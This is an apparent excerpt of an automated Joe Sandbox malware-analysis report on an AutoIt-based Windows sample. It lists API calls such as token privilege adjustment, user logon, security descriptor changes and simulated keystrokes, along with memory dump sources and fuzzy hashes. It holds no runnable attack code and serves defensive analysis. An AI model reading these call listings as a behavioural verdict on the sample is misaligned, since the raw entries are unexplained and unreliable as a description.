                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 14491d0b9945779f1f1e7cb3f8beac2928b1ce426015c58378dfa754f0b6f7e4
                                                                      • Instruction ID: e404e36772ac67955ab5d149d69eaf0afd0a7de98ee504897884346dffc834d4
                                                                      • Opcode Fuzzy Hash: 14491d0b9945779f1f1e7cb3f8beac2928b1ce426015c58378dfa754f0b6f7e4
                                                                      • Instruction Fuzzy Hash: B2E0E5391002A4A6E73926679C00B9A3748AB427F6F190123BC24A74D1CB51DF8991F9
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24F6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 884a10b9932158cb35cc14403e3b2cf8ae047b36affcfc56d037f21554c86e87
                                                                      • Instruction ID: 74a292d44e26036955d113bb049f39da42626acbe4883bc98bc6ecf17bd3d2ab
                                                                      • Opcode Fuzzy Hash: 884a10b9932158cb35cc14403e3b2cf8ae047b36affcfc56d037f21554c86e87
                                                                      • Instruction Fuzzy Hash: 4CF0A071005321CFCB388FA5E590816B7E0FF40319310897EE1EA82910C7319844DF10
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00C6EE51,00CE3630,00000002), ref: 00C8CD26
                                                                        • Part of subcall function 00C8CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00C8CD19,?,?,?), ref: 00C8CC59
                                                                        • Part of subcall function 00C8CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00C8CD19,?,?,?,?,00C6EE51,00CE3630,00000002), ref: 00C8CC6E
                                                                        • Part of subcall function 00C8CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00C8CD19,?,?,?,?,00C6EE51,00CE3630,00000002), ref: 00C8CC7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$Write
                                                                      • String ID:
                                                                      • API String ID: 3847668363-0
                                                                      • Opcode ID: 602cfba85bc7e7ef64363db9088091aa398bb30967d2bcbdb309f6b874401903
                                                                      • Instruction ID: 609fd163aaec615c3d4ac71ad3058d4572d979e80ac22031afdb6a1163678762
                                                                      • Opcode Fuzzy Hash: 602cfba85bc7e7ef64363db9088091aa398bb30967d2bcbdb309f6b874401903
                                                                      • Instruction Fuzzy Hash: CAE06D7A400704EFC721AF9ADD408AAFBF8FF84364710852FE996D2110D3B1AA14DB60
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C22DC4
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_wcslen
                                                                      • String ID:
                                                                      • API String ID: 541455249-0
                                                                      • Opcode ID: 8ebe9b0acae274b59a75d312204ef584d3ebc5981e122e9af8356c1f4e5f707c
                                                                      • Instruction ID: 153af8c30089c832ed22278ebd1d9efb60af3742a6f5b9ec4b855b88d896a7d2
                                                                      • Opcode Fuzzy Hash: 8ebe9b0acae274b59a75d312204ef584d3ebc5981e122e9af8356c1f4e5f707c
                                                                      • Instruction Fuzzy Hash: 8EE0CD726001245BC720D6989C05FDA77DDDFC8790F040171FD09D7248D960AD809551
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00C60704,?,?,00000000,?,00C60704,00000000,0000000C), ref: 00C603B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 2778a5a9dcb7957e18d7ed896da1a59ea508340f027fccf47eb771796f7fb271
                                                                      • Instruction ID: 3073017e34baff4bfb0f1b9e75a36dd97ca3a873c9b48ecaba5e68d47e5681a6
                                                                      • Opcode Fuzzy Hash: 2778a5a9dcb7957e18d7ed896da1a59ea508340f027fccf47eb771796f7fb271
                                                                      • Instruction Fuzzy Hash: BBD06C3204010DBBDF028F84DD46EDE3BAAFB48714F014100BE1866020C732E821AB90
                                                                      APIs
                                                                        • Part of subcall function 00C25745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C2949C,?,00008000), ref: 00C25773
                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00C976DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1214770103-0
                                                                      • Opcode ID: 402957ba8fb6c376faf4043beb0cdefa6a1d62071aa86077834e985afc5fca3d
                                                                      • Instruction ID: 167e118d1c63eb92da4f06df2517bfcc9c789275f2b76de755c3e7eefaeac6af
                                                                      • Opcode Fuzzy Hash: 402957ba8fb6c376faf4043beb0cdefa6a1d62071aa86077834e985afc5fca3d
                                                                      • Instruction Fuzzy Hash: EB81CE306097019FCB14EF28D495B6EB7E1BF88310F04462CF8965B6A2DB30EE45DB92
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(?,?,00000000,00C624E0), ref: 00C26266
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 1edea6a02ecfd47b1573b2ddc5db12afc2b9987f0c5df5e4f0d435b490f66a1d
                                                                      • Instruction ID: 5811c08ebe9f16fb08fd2ccb22570dd5653ad5925c783986066612bfca827c9b
                                                                      • Opcode Fuzzy Hash: 1edea6a02ecfd47b1573b2ddc5db12afc2b9987f0c5df5e4f0d435b490f66a1d
                                                                      • Instruction Fuzzy Hash: A5E0B675400B11CFC3358F1AE804552FBF5FFE13613204A2ED0F592A60D3B059868F60
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 0314BE61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: 729a9348fbac90d1d873cd2dff87243c186f1f10fee85c767fbf921d023fb546
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: 58E0E67494410DDFDB00EFB8D54969E7FB4EF04301F1041A1FD01E2280D7309D608A62
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CB961A
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CB965B
                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CB969F
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CB96C9
                                                                      • SendMessageW.USER32 ref: 00CB96F2
                                                                      • GetKeyState.USER32(00000011), ref: 00CB978B
                                                                      • GetKeyState.USER32(00000009), ref: 00CB9798
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CB97AE
                                                                      • GetKeyState.USER32(00000010), ref: 00CB97B8
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CB97E9
                                                                      • SendMessageW.USER32 ref: 00CB9810
                                                                      • SendMessageW.USER32(?,00001030,?,00CB7E95), ref: 00CB9918
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CB992E
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CB9941
                                                                      • SetCapture.USER32(?), ref: 00CB994A
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB99AF
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CB99BC
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CB99D6
                                                                      • ReleaseCapture.USER32 ref: 00CB99E1
                                                                      • GetCursorPos.USER32(?), ref: 00CB9A19
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB9A26
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CB9A80
                                                                      • SendMessageW.USER32 ref: 00CB9AAE
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CB9AEB
                                                                      • SendMessageW.USER32 ref: 00CB9B1A
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CB9B3B
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CB9B4A
                                                                      • GetCursorPos.USER32(?), ref: 00CB9B68
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB9B75
                                                                      • GetParent.USER32(?), ref: 00CB9B93
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CB9BFA
                                                                      • SendMessageW.USER32 ref: 00CB9C2B
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB9C84
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CB9CB4
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CB9CDE
                                                                      • SendMessageW.USER32 ref: 00CB9D01
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB9D4E
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CB9D82
                                                                        • Part of subcall function 00C39944: GetWindowLongW.USER32(?,000000EB), ref: 00C39952
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB9E05
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3429851547-4164748364
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00CB48F3
                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00CB4908
                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00CB4927
                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00CB494B
                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00CB495C
                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00CB497B
                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00CB49AE
                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00CB49D4
                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00CB4A0F
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CB4A56
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CB4A7E
                                                                      • IsMenu.USER32(?), ref: 00CB4A97
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CB4AF2
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CB4B20
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB4B94
                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00CB4BE3
                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00CB4C82
                                                                      • wsprintfW.USER32 ref: 00CB4CAE
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CB4CC9
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CB4CF1
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CB4D13
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CB4D33
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CB4D5A
                                                                      Similarity
                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 4054740463-328681919
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C3F998
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C7F474
                                                                      • IsIconic.USER32(00000000), ref: 00C7F47D
                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00C7F48A
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C7F494
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7F4AA
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C7F4B1
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7F4BD
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7F4CE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7F4D6
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C7F4DE
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C7F4E1
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F4F6
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F501
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F50B
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F510
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F519
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F51E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F528
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F52D
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C7F530
                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C7F557
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      APIs
                                                                        • Part of subcall function 00C816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C8170D
                                                                        • Part of subcall function 00C816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C8173A
                                                                        • Part of subcall function 00C816C3: GetLastError.KERNEL32 ref: 00C8174A
                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C81286
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C812A8
                                                                      • CloseHandle.KERNEL32(?), ref: 00C812B9
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C812D1
                                                                      • GetProcessWindowStation.USER32 ref: 00C812EA
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00C812F4
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C81310
                                                                        • Part of subcall function 00C810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C811FC), ref: 00C810D4
                                                                        • Part of subcall function 00C810BF: CloseHandle.KERNEL32(?,?,00C811FC), ref: 00C810E9
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 22674027-1027155976
                                                                      APIs
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C81114
                                                                        • Part of subcall function 00C810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81120
                                                                        • Part of subcall function 00C810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C8112F
                                                                        • Part of subcall function 00C810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81136
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C8114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C80BCC
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C80C00
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80C17
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C80C51
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C80C6D
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80C84
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C80C8C
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C80C93
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C80CB4
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C80CBB
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C80CEA
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C80D0C
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C80D1E
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80D45
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D4C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80D55
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D5C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80D65
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D6C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C80D78
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D7F
                                                                        • Part of subcall function 00C81193: GetProcessHeap.KERNEL32(00000008,00C80BB1,?,00000000,?,00C80BB1,?), ref: 00C811A1
                                                                        • Part of subcall function 00C81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C80BB1,?), ref: 00C811A8
                                                                        • Part of subcall function 00C81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C80BB1,?), ref: 00C811B7
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C969BE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C96A12
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C96A4E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C96A75
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C96AB2
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C96ADF
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3830820486-3289030164
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C99663
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C996A1
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00C996BB
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C996D3
                                                                      • FindClose.KERNEL32(00000000), ref: 00C996DE
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C996FA
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C9974A
                                                                      • SetCurrentDirectoryW.KERNEL32(00CE6B7C), ref: 00C99768
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C99772
                                                                      • FindClose.KERNEL32(00000000), ref: 00C9977F
                                                                      • FindClose.KERNEL32(00000000), ref: 00C9978F
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 73fa7314986419c50c56b12c0578c7b09a87098f68109ea9dd91af3815fa8213
                                                                      • Instruction ID: d74c898258ecdcc0378eb117d3120593c56a95c12d7572184e6bcb2251e7007a
                                                                      • Opcode Fuzzy Hash: 73fa7314986419c50c56b12c0578c7b09a87098f68109ea9dd91af3815fa8213
                                                                      • Instruction Fuzzy Hash: B031A3325402196BDF24AFF9DC8DBDE77ACEF49320F14426AF915E21A0DB74DA448A24
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C997BE
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C99819
                                                                      • FindClose.KERNEL32(00000000), ref: 00C99824
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C99840
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C99890
                                                                      • SetCurrentDirectoryW.KERNEL32(00CE6B7C), ref: 00C998AE
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C998B8
                                                                      • FindClose.KERNEL32(00000000), ref: 00C998C5
                                                                      • FindClose.KERNEL32(00000000), ref: 00C998D5
                                                                        • Part of subcall function 00C8DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C8DB00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: 62b328f67971ff25f2d11fc4e77e70ab09d02d0b36d81d0280e1ed88919ff8d3
                                                                      • Instruction ID: 297f455901cd246c1bcf01e85ac041b12dda6683e1c10f1bd4bddc755a1aa6bb
                                                                      • Opcode Fuzzy Hash: 62b328f67971ff25f2d11fc4e77e70ab09d02d0b36d81d0280e1ed88919ff8d3
                                                                      • Instruction Fuzzy Hash: E231A5315006196BDF24AFB9DC4CADE77ACEF06320F14416DE864A21E1DB71DA44DA64
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00C98257
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C98267
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C98273
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C98310
